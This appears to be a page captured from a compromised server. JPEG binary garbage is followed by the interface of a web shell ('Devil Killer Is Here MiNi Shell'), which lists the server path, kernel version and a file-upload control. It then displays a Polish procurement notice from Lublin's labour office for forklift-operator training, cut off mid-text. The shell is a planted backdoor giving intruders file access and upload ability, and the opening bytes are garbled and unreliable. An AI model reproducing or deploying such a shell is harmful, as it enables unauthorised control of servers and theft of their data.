JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220613/0020679001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa organizacji szkolenia grupowego w ramach projektu:&#34;Aktywizacja osób młodych pozostających bez pracy w mieście Lublin&#34; - Operator wózków jezdniowych z uprawnieniami UDT </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Urząd Pracy w Lublinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431213647</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Niecała 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-080</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">814665200</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">814665201</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetarg@mup.lublin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">muplublin.praca.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa organizacji szkolenia grupowego w ramach projektu:&#34;Aktywizacja osób młodych pozostających bez pracy w mieście Lublin&#34; - Operator wózków jezdniowych z uprawnieniami UDT </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1dd47885-e726-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00206790</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00020491/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.37 organizacja szkolenia grupowego w ramach projektu: Aktywizacja osób młodych pozostających bez pracy w mieście Lublin(VI)&#34; Operator wózków jezdniowych z uprawnieniami UDT</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Aktywizacja osób młodych pozostających bez pracy w mieście Lublin (VI)” dla osób bezrobotnych i innych uprawnionych osób zarejestrowanych w Miejskim Urzędzie Pracy w Lublinie finansowanego w całości ze środków publicznych, współfinansowanego z Europejskiego Funduszu Społecznego w ramach Osi Priorytetowej I, Rynek pracy otwarty dla wszystkich </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między<br/>Zamawiającym, a Wykonawcami odbywa się za pośrednictwem miniPortalu<br/>https://miniportal.uzp.gov.pl , ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej.<br/>2. Wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pośrednictwem<br/>dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji), drogą<br/>elektroniczną – e-mail: przetarg@mup.lublin.pl.<br/>3. adres strony internetowej prowadzonego postępowania: https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP i konto Wykonawcy na miniPortalu.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do<br/>formularza do komunikacji. 2.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie<br/>korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>Zasady składania ofert oraz dokumentów składanych wraz z ofertą oraz wymagania techniczne i organizacyjne ich wysyłania<br/>opisane zostały w Instrukcji użytkownika. Wykonawca zobowiązany jest zapoznać się z ww. Instrukcją i postępować wg zasad w niej<br/>wskazanych. Wykonawca ubiegając się o udzielenie zamówienia w szczególności składając ofertę akceptuje zasady korzystania z<br/>systemu miniPortal wskazane w<br/>Instrukcji użytkownika i SWZ. W celu korzystania z systemu miniPortal konieczne jest dysponowanie przez użytkownika<br/>urządzeniem teleinformatycznym z dostępem do sieci Internet. Aplikacja działa tylko<br/>na platformie Windows i wymaga .NET Framework 4.5. W przypadku korzystania z urządzeń mobilnych oraz Mac lub Linux, dostęp<br/>do wszystkich funkcjonalności systemu miniPortal może być ograniczony. Specyfikacja połączenia, formatu przesyłanych danych<br/>oraz kodowania i oznaczania czasu odbioru danych:-specyfikacja połączenia formularze udostępnione są za pomocą protokołu TLS<br/>1.2,- format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem UTF-8,-oznaczenia czasu<br/>odbioru danych – miniPortal - wszelkie operacje opierają się o<br/>czas serwera i dane zapisywane są z dokładnością co do setnej części sekundy,- integracja z systemem ePUAP jest wykonana w<br/>wykorzystaniem standardowego mechanizmu ePUAP. W przypadku Wykonawcy wysyłającego wniosek do Zamawiającego, ESP<br/>Zamawiającego automatycznie<br/>generuje Rodzaj Urzędowego Poświadczenia Odbioru, czyli Urzędowe Poświadczenie Przedłożenia (UPP), które jest powiązane z<br/>wysyłanym dokumentem. W UPP w sekcji „Dane poświadczenia” jest<br/>zawarta informacja o dacie doręczenia.System dostępny jest za pośrednictwem następujących przeglądarek internetowych:<br/>Microsoft Internet Explorer od wersji 9.0, Mozilla Firefox od wersji 15,<br/>Google Chrome od wersji 20.3. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. 4. Za datę przekazania oferty,<br/>wniosków, zawiadomień, dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.5. Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku” dostępnego na ePUAP<br/>i udostępnionego również na miniPortalu, zgodnie z Instrukcją użytkownika. Funkcjonalność do zaszyfrowania oferty przez<br/>Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania. W formularzu oferty Wykonawca<br/>zobowiązany jest podać adres skrzynki<br/>ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest<br/>Miejski Urząd Pracy w Lublinie (zwany dalej MUP w Lublinie) reprezentowany przez Dyrektora MUP w Lublinie, pod adresem ul.<br/>Niecała 14, 20-080 Lublin.2. Z Inspektorem Ochrony Danych MUP w Lublinie<br/>można skontaktować się pod numerem telefonu (81) 466 -52-72, e- mail: iod@mup.lublin.pl lub listownie na ww. adres siedziby<br/>Administratora.3. Pani/Pana dane osobowe są przetwarzane w następujących celach:a) Zgodnie z art. 6 ust. 1 lit. c) lub f) w celu<br/>przeprowadzenia niniejszego<br/>postępowania o udzielenie zamówienia publicznego zgodnie z ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych;b)<br/>Zgodnie z art. 6 ust. 1 lit. c) w związku z realizacją obowiązków ustawowych wynikających z ustawy z dnia 11 września 2019 r.<br/>Prawo zamówień publicznych;c) Zgodnie z art. 6 ust. 1 lit. b) RODO w celu zawarcia i realizacji umowy, której stroną jest osoba,<br/>której dane dotyczą;d) Zgodnie z art. 6 ust. 1 lit. c) RODO w związku z realizacją obowiązku prawnego ciążącego na<br/>Administratorze, w szczególności wynikającym z ustawy z dnia 14 lipca 1983 r. o<br/>narodowym zasobie archiwalnym i archiwach.4. Pani/Pana dane osobowe mogą zostać przekazane organom władzy publicznej oraz<br/>podmiotom wykonującym zadania publiczne lub działającym na zlecenie organów władzy publicznej, w zakresie i w celach, które<br/>wynikają z przepisów powszechnie<br/>obowiązującego prawa lub innym podmiotom świadczącym usługi Administratorowi na podstawie podpisanych umów.5.<br/>Administrator nie będzie przekazywał danych osobowych do państw trzecich lub<br/>do organizacji międzynarodowej.6. Pani/Pana dane przetwarzane w związku z celami wymienionymi w pkt 3 lit. a), b) i d) będą<br/>przechowywane przez okres prowadzenia postępowania o udzielenie zamówienia publicznego oraz po jego zakończeniu zgodnie z<br/>Instrukcją Kancelaryjną i Jednolitym<br/>Rzeczowym Wykazem Akt MUP w Lublinie (dostęp: https://biuletyn.lublin.eu/mup/sposobyprzyjmowaniaizalatwianiaspraw/<br/>instrukcja-kancelaryjna,1,1820,1.html) na podstawie ustawy z dnia 14 lipca 1983 r. o<br/>narodowym zasobie archiwalnym i archiwach. W przypadku przetwarzania Pani/Pana danych w związku z celami wymienionymi w<br/>pkt 3 lit. c) i d) będą one przechowywane przez okres trwania umowy, okres realizacji<br/>umowy oraz wynikających z jej tytułu roszczeń oraz upływu okresu na<br/>jaki została udzielona gwarancja (przysługuje rękojmia). 7. Posiada Pani/Pan prawo do żądania od Administratora dostępu do<br/>swoich danych osobowych na podstawie art. 15 RODO oraz do ich sprostowania na podstawie art. 16 RODO. Na podstawie art. 18<br/>RODO posiada Pani/Pan prawo<br/>żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO z tym, że wystąpienie z takim żądaniem nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie<br/>zamówienia publicznego. Ponadto posiada Pani/Pan prawo do sprzeciwu na podstawie art. 21 RODO, wobec przetwarzania danych<br/>osobowych, z wyłączeniem sytuacji gdy podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c) RODO.8. Ma Pani/Pan prawo wniesienia skargi do organu nadzorczego<br/>zajmującego się ochroną danych osobowych, tj. Prezesa Urzędu Ochrony Danych<br/>Osobowych.9. W związku z art. 17 ust. 3 lit. b), d) lub e) RODO nie przysługuje Pani/Panu prawo do usunięcia danych osobowych<br/>oraz prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20 RODO.10. Administrator przetwarza podane dane osobowe w celu realizacji obowiązku ustawowego. Podanie danych<br/>osobowych jest dobrowolne, lecz odmowa ich podania skutkuje brakiem<br/>możliwości przeprowadzenia postępowania o udzielenie zamówienia publicznego oraz zawarcia i realizacji umowy.11. Pani/Pana<br/>dane osobowe nie będą wykorzystywane do zautomatyzowanego podejmowania decyzji, w tym profilowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MUP.PKIII.371.49.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Operator wózków jezdniowych z uprawnieniami UDT<br/><br/>Kod zawodu: 834401 /Kierowca operator wózków jezdniowych (widłowych) <br/>Liczba godzin:	50 godzin zegarowych zajęć + egzamin przed Urzędem Dozoru Technicznego lub równoważnym podmiotem do tego uprawnionym.<br/>Liczba osób:	10 osób (1 grupa x 10 osób) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert, które nie zostały odrzucone, na<br/>podstawie następujących kryteriów oceny ofert:<br/>a) Kryterium „cena”: waga 60% (C)<br/>b) Kryterium „doświadczenie kadry dydaktycznej”: waga 40% (D)<br/>2. Punkty za kryterium „Cena” (C) zostaną obliczone według wzoru:<br/>C = Cn / Co x 100 pkt x 60 %<br/>gdzie: Cn - najniższa ofertowa cena brutto spośród ocenianych ważnych ofert Co - cena oferty<br/>ocenianej Wykonawca może otrzymać w tym kryterium maksymalnie 60 punktów.<br/>3. Wartość punktowa w kryterium „doświadczenie kadry dydaktycznej” (D)<br/>W ramach kryterium Zamawiający przyzna punkty za doświadczenie zawodowe trenera związane z<br/>przedmiotem zamówienia (liczba szkoleń przeprowadzonych w okresie ostatnich 3 lat poprzedzających<br/>złożenie ofert szkoleń w zakresie objętym wykonywanymi czynnościami w zamówieniu zgodnie z<br/>planem nauczania) – maksymalnie 40 pkt w następujący sposób:<br/>a) 1 szkolenie – 0 pkt<br/>b) 2-4 szkolenia – 2 pkt<br/>c) 5 - 7 szkoleń – 10 pkt<br/>d) 8 - 9 szkoleń - 15 pkt<br/>e) 10 i więcej - 40 pkt<br/>W przypadku gdy Wykonawca w ramach osób prowadzących zajęcia wynikające z planu nauczania<br/>wskaże w kadrze dydaktycznej osobę, która wykonuje zawód nauczyciela (w okresie ostatnich trzech<br/>lat przed upływem terminu otwarcia ofert, przedmiotów o tematyce podobnej pod względem zawartości<br/>merytorycznej w zakresie tematyki zajęć, które będzie prowadziła dana osoba przy realizacji<br/>przedmiotu zamówienia zgodnie z planem nauczania) osoba ta w ramach niniejszego kryterium uzyska<br/>maksymalną liczbę punktów jaką może uzyskać 1 osoba w kadrze.<br/>W przypadku gdy Wykonawca w ramach osób prowadzących zajęcia wynikające z planu nauczania<br/>wskaże w kadrze dydaktycznej osobę, która wykonuje zawód nauczyciela (w okresie ostatnich trzech<br/>lat przed terminem otwarcia ofert, przedmiotów o tematyce podobnej pod względem zawartości<br/>merytorycznej w zakresie tematyki zajęć, które będzie prowadziła dana osoba przy realizacji<br/>przedmiotu zamówienia zgodnie z planem nauczania) oraz która jednocześnie posiada doświadczenie<br/>zawodowe trenera związane z przedmiotem zamówienia (szkolenia przeprowadzone w okresie<br/>ostatnich 3 lat poprzedzających złożenie ofert, szkoleń w zakresie objętym wykonywanymi<br/>czynnościami w zamówieniu zgodnie z planem nauczania) osoba ta w ramach niniejszego kryterium<br/>uzyska maksymalną liczbę punktów jaką może uzyskać 1 osoba w kadrze.<br/>Oferty zostaną przeliczone wg wzoru:<br/>D = (Db / DL) / D max. tj. 40 x 100 x 40 %<br/>Gdzie:<br/>Db – Suma punktów uzyskanych przez ocenianą kadrę dydaktyczną oferty badanej<br/>DL – Liczba osób kadry dydaktycznej w ocenianej ofercie<br/>D max. – Najwyższa liczba punktów wynikająca z doświadczenia jaką może uzyskać 1 osoba<br/>w kadrze<br/>Punkty w ocenianej ofercie zostaną przyznane na podstawie wykazu osób, które zostaną skierowane<br/>do wykonania zamówienia, zgodnie z wzorem zawartym w formularzu oferty.<br/>W ramach informacji dotyczących osób, które zostaną skierowane do wykonania zamówienia<br/>Wykonawca podaje dane dotyczące wszystkich osób wskazanych w ramach kadry podstawowej<br/>i rezerwowej.<br/>Wykonawca może otrzymać w tym kryterium maksymalnie 40 punktów.<br/>4.Zamawiający wybierze ofertę, która otrzyma najwyższą liczbę punktów (P) stanowiących sumę<br/>przyznanych w ramach każdego z podanych kryteriów, wyliczoną zgodnie z poniższym wzorem:<br/>P = C + D<br/>P – łączna liczba przyznanych ofercie Wykonawcy w kryterium „cena” oraz kryterium „doświadczenie<br/>kadry dydaktycznej”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie kadry dydaktycznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy spełniają warunki udziału<br/>w postępowaniu dotyczące:<br/>1.1. Zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>1.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>a) Wykonawca spełni niniejszy warunek, jeżeli: posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez<br/>Wojewódzki Urząd Pracy na podstawie art. 20 ust. 1 ustawy<br/>z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy (Dz.U. z 2022 poz. 690 z późn. zm.)<br/>1.3. Sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie określa warunku w ww. zakresie<br/>1.4. Zdolności technicznej lub zawodowej w zakresie:<br/>a) Wykonawca spełnia ten warunek jeżeli: posiada doświadczenie w świadczeniu usług szkoleniowych tematycznie<br/>związanych z przedmiotem zamówienia, tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej dwa szkolenia grupowe w zakresie<br/>tematycznym odpowiadającym przedmiotowi zamówienia oraz załączy dokumenty na potwierdzenie, że usługi te zostały<br/>wykonane należycie.<br/>Przez szkolenie grupowe należy rozumieć szkolenie, w którym uczestniczyło co najmniej 10 osób szkolonych w tym samym<br/>miejscu i w tym samym okresie, przeszkolonych<br/>w ramach jednej umowy, realizowanej dla jednej instytucji/podmiotu.<br/>b) Zamawiający wymaga, aby Wykonawca dysponował do realizacji zajęć edukacyjnych wynikających z planu nauczania<br/>osobami zdolnymi do wykonania zamówienia – dotyczy kadry podstawowej<br/>i rezerwowej.<br/>• Zamawiający wymaga, aby osoby w kadrze dydaktycznej realizującej zajęcia edukacyjne (kadra podstawowa i rezerwowa)<br/>posiadały: doświadczenie niezbędne do wykonania zamówienia<br/>i wykształcenie niezbędne do wykonania zamówienia.<br/>Za posiadanie doświadczenia niezbędnego do wykonania zamówienia Zamawiający uzna:<br/>- przeprowadzenie w okresie ostatnich trzech lat przed upływem terminu składania ofert przez osobę w kadrze dydaktycznej (kadra podstawowa i 